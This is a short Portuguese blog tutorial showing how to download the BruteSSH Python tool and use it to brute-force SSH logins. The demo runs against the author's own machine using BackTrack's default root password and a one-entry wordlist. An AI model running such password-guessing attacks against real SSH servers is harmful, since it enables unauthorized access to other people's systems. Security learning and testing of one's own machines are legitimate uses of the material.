![[HC]Host - No Caminho Certo Do Conhecimento!](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcsM_nM498cobNIbdrocrPK5w4mI1ynDprymBd191Rt7RVDyeml4uYJ3VPsn8TA2E0wWcKYyomsLtEotMrz-dDZ8dRf8hxC82BeuQtS_viI2rpgsVedCkLgpkkCg98gg6WmP1uw0Qhdp4/s1600/PROJETO+CERTO.png)
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)
Instalando o BruteSSHAbra o terminal e faça o download do arquivo pelo comandos a seguir:
root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2
Agora vamos decompactar o arquivo:
root@bt:~# tar -jxvf brutessh-0.5.tar.bz2
Depois basta entrar no diretório
root@bt:~# cd brutessh
Agora é só rodar o script feito em python (py):
root@bt:~/brutessh# python brutessh.py
CLIQUE PARA AMPLIAR
Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.
-h: Host destino
-u: Usuário
-d: Arquivo de senha
Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criaruma pequena world list com a senha correspondente.
CLIQUE PARA AMPLIAR
Agora vamos disparar o ataque usando a seguinte sintaxe:
root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password
Onde os parâmetros foram explicados acima. O resultado foi:
CLIQUE PARA AMPLIAR
0 comentários:
Postar um comentário
Proibido palavras ofensivas, racistas ou descriminatórias.
[Seu Comentário será liberado no máximo em 24horas]